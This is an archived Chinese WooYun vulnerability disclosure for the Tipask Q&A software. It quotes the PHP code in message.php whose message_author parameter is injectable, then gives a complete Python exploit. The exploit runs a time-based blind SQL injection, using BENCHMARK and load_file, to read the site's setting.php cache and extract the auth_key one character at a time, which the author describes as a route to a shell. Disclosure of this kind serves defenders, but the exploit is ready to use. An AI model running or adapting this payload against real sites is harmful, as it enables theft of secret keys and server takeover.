乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-03-15: 厂商已经主动忽略漏洞,细节向公众公开
审核真给力,刚提交就通过了 ,赞啊!!!!
部分案例:
经分析下列文件存在注入/control/message.php代码如下
function onremovedialog() { if($this->post['message_author']){ $authors = $this->post['message_author']; $_ENV['message']->remove_by_author($authors); $this->message("对话删除成功!", get_url_source()); } }
跟进remove_by_author函数
function remove_by_author($authors) { foreach ($authors as $fromuid) { $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status=1)"); $this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status=2"); $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=2 WHERE fromuid<>touid AND ((fromuid=$fromuid AND touid=" . $this->base->user['uid'] . ") AND status IN (0,1))"); $this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=1 WHERE fromuid<>touid AND ((fromuid=" . $this->base->user['uid'] . " AND touid=" . $fromuid . ") AND status IN (0,2))"); } }
可以看出,这里存在多处注入为了无限制getshell,依然还是获取加密的auth_keyExp,直接参照上一个漏洞改改就可以用:
import urllibimport urllib2from time import *def inject(url,payload): post = urllib.urlencode({ 'message_author[]':payload }) header = {'Cookie':'tp_auth=70349FVn7tDasEWTHDyi6y7itpKIFhjiQ66UaK7mwIB31Rc7E0MttS8v7QfbBy1yGmiHDNptr3sjTC7RyXhM'} req = urllib2.Request(url,post,header) start_time = time() resp = urllib2.urlopen(req) flag = int(time()-start_time) return flagdef exploit(): result = "" url = 'http://127.0.0.1/tipask/?message/removedialog.html' for i in range(4677,4741): for num in range(32,127): flag= inject(url,"6 AND touid=2)) and if(ord(substring((select/**/load_file(0x443A5C417070536572765C7777775C74697061736B5C646174615C63616368655C73657474696E672E706870)),%s,1))=%s,BENCHMARK(5000000,md5(1)),null)#"%(i,num)) if flag>0: mstr = i - 4676 result = result+chr(num) print 'auth_key =>'+result breakif __name__=="__main__": exploit()
运行,如图所示:
过滤
未能联系到厂商或者厂商积极拒绝